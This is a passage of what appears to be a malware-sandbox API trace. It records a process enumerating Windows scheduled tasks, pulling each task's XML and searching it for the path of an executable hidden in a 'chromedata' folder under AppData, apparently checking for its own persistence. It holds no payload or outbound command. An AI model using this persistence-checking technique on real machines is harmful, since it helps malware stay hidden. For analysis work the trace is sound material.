<Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <ComHandler>\r\n      <ClassId>{CF2CF428-325B-48D3-8CA8-7633E36E5A32}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0098.401] IUnknown:Release (This=0x1690080) returned 0x0
	[0098.401] IRegisteredTaskCollection:get_Item (in: This=0x63fed8, index=0x128d34*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x1690080) returned 0x0
	[0098.401] IRegisteredTask:get_Name (in: This=0x1690080, pName=0x128e3c | out: pName=0x128e3c*="AD RMS Rights Policy Template Management (Manual)") returned 0x0
	[0098.401] IRegisteredTask:get_Xml (in: This=0x1690080, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2006-11-10T14:29:55.5851926</Date>\r\n    <Author>$(@%systemRoot%\\System32\\msdrm.dll,-6001)</Author>\r\n    <Description>$(@%systemRoot%\\System32\\msdrm.dll,-6003)</Description>\r\n    <URI>\\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger id=\"06b3f632-87ad-4ac0-9737-48ea5ddbaf11\">\r\n      <Enabled>false</Enabled>\r\n      <Delay>PT1H</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-1-0</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <ComHandler>\r\n      <ClassId>{BF5CB148-7C77-4d8a-A53E-D81C70CF743C}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0098.404] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2006-11-10T14:29:55.5851926</Date>\r\n    <Author>$(@%systemRoot%\\System32\\msdrm.dll,-6001)</Author>\r\n    <Description>$(@%systemRoot%\\System32\\msdrm.dll,-6003)</Description>\r\n    <URI>\\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger id=\"06b3f632-87ad-4ac0-9737-48ea5ddbaf11\">\r\n      <Enabled>false</Enabled>\r\n      <Delay>PT1H</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-1-0</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <ComHandler>\r\n      <ClassId>{BF5CB148-7C77-4d8a-A53E-D81C70CF743C}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0098.434] IUnknown:Release (This=0x1690080) returned 0x0
	[0098.434] IUnknown:Release (This=0x63fed8) returned 0x0
	[0098.434] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fed8) returned 0x0
	[0098.435] ITaskFolderCollection:get_Count (in: This=0x63fed8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0098.436] IUnknown:Release (This=0x63fed8) returned 0x0
	[0098.436] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0098.436] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x2, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0098.436] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe80) returned 0x0
	[0098.438] IRegisteredTaskCollection:get_Count (in: This=0x63fe80, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0098.438] IRegisteredTaskCollection:get_Item (in: This=0x63fe80, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff68) returned 0x0
	[0098.438] IRegisteredTask:get_Name (in: This=0x63ff68, pName=0x128e3c | out: pName=0x128e3c*="PolicyConverter") returned 0x0
	[0098.438] IRegisteredTask:get_Xml (in: This=0x63ff68, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)</SecurityDescriptor>\r\n    <Source>$(@%systemroot%\\system32\\appidsvc.dll,-300)</Source>\r\n    <Author>$(@%systemroot%\\system32\\appidsvc.dll,-301)</Author>\r\n    <Description>$(@%systemroot%\\system32\\appidsvc.dll,-302)</Description>\r\n    <URI>Microsoft\\Windows\\AppID\\PolicyConverter</URI>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\appidpolicyconverter.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0098.440] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)</SecurityDescriptor>\r\n    <Source>$(@%systemroot%\\system32\\appidsvc.dll,-300)</Source>\r\n    <Author>$(@%systemroot%\\system32\\appidsvc.dll,-301)</Author>\r\n    <Description>$(@%systemroot%\\system32\\appidsvc.dll,-302)</Description>\r\n    <URI>Microsoft\\Windows\\AppID\\PolicyConverter</URI>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\appidpolicyconverter.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0098.463] IUnknown:Release (This=0x63ff68) returned 0x0
	[0098.463] IRegisteredTaskCollection:get_Item (in: This=0x63fe80, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff68) returned 0x0
	[0098.464] IRegisteredTask:get_Name (in: This=0x63ff68, pName=0x128e3c | out: pName=0x128e3c*="VerifiedPublisherCertStoreCheck") returned 0x0
	[0098.464] IRegisteredTask:get_Xml (in: This=0x63ff68, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)</SecurityDescriptor>\r\n    <Source>$(@%systemroot%\\system32\\appidsvc.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\appidsvc.dll,-201)</Author>\r\n    <Description>$(@%systemroot%\\system32\\appidsvc.dll,-202)</Description>\r\n    <URI>Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT30M</Delay>\r\n      <Repetition>\r\n        <Interval>PT24H</Interval>\r\n      </Repetition>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>10</Priority>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\appidcertstorecheck.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0098.466] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)</SecurityDescriptor>\r\n    <Source>$(@%systemroot%\\system32\\appidsvc.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\appidsvc.dll,-201)</Author>\r\n    <Description>$(@%systemroot%\\system32\\appidsvc.dll,-202)</Description>\r\n    <URI>Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT30M</Delay>\r\n      <Repetition>\r\n        <Interval>PT24H</Interval>\r\n      </Repetition>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>10</Priority>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\appidcertstorecheck.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0098.497] IUnknown:Release (This=0x63ff68) returned 0x0
	[0098.497] IUnknown:Release (This=0x63fe80) returned 0x0
	[0098.497] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe80) returned 0x0
	[0098.498] ITaskFolderCollection:get_Count (in: This=0x63fe80, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0098.499] IUnknown:Release (This=0x63fe80) returned 0x0
	[0098.499] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0098.499] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x3, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0098.499] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fea0) returned 0x0
	[0098.501] IRegisteredTaskCollection:get_Count (in: This=0x63fea0, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0098.501] IRegisteredTaskCollection:get_Item (in: This=0x63fea0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x1690048) returned 0x0
	[0098.501] IRegisteredTask:get_Name (in: This=0x1690048, pName=0x128e3c | out: pName=0x128e3c*="AitAgent") returned 0x0
	[0098.501] IRegisteredTask:get_Xml (in: This=0x1690048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Version>1.0</Version>\r\n    <URI>\\Microsoft\\Windows\\Application Experience\\AitAgent</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\aitagent.exe,-701)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\aitagent.exe,-701)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\aitagent.exe,-702)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2007-10-08T02:30:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT22H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Priority>9</Priority>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>aitagent</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0098.503] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Version>1.0</Version>\r\n    <URI>\\Microsoft\\Windows\\Application Experience\\AitAgent</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\aitagent.exe,-701)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\aitagent.exe,-701)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\aitagent.exe,-702)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2007-10-08T02:30:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT22H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Priority>9</Priority>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>aitagent</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0098.531] IUnknown:Release (This=0x1690048) returned 0x0
	[0098.531] IRegisteredTaskCollection:get_Item (in: This=0x63fea0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x1690048) returned 0x0
	[0098.531] IRegisteredTask:get_Name (in: This=0x1690048, pName=0x128e3c | out: pName=0x128e3c*="ProgramDataUpdater") returned 0x0
	[0098.531] IRegisteredTask:get_Xml (in: This=0x1690048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Version>1.0</Version>\r\n    <URI>\\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\aepdu.dll,-701)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\aepdu.dll,-701)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\aepdu.dll,-702)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2007-10-08T00:30:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Priority>4</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>aepdu.dll,AePduRunUpdate</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0098.534] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Version>1.0</Version>\r\n    <URI>\\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\aepdu.dll,-701)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\aepdu.dll,-701)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\aepdu.dll,-702)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2007-10-08T00:30:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Priority>4</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    